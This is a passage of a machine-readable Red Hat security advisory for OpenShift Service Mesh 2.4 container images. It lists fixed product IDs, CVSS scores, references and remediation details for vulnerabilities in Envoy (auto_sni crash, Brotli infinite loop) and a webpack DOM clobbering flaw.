"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters", }, { cve: "CVE-2024-32976", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-05-24T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2283145", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy's Brotli decompressor. This flaw allows a remote, unauthenticated attacker to trigger an infinite loop, causing a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Brotli decompressor infinite loop", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-32976", }, { category: "external", summary: "RHBZ#2283145", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283145", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-32976", url: "https://www.cve.org/CVERecord?id=CVE-2024-32976", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-32976", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-32976", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7724", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "envoy: Brotli decompressor infinite loop", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:22:37+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64", "8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x", "8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le", 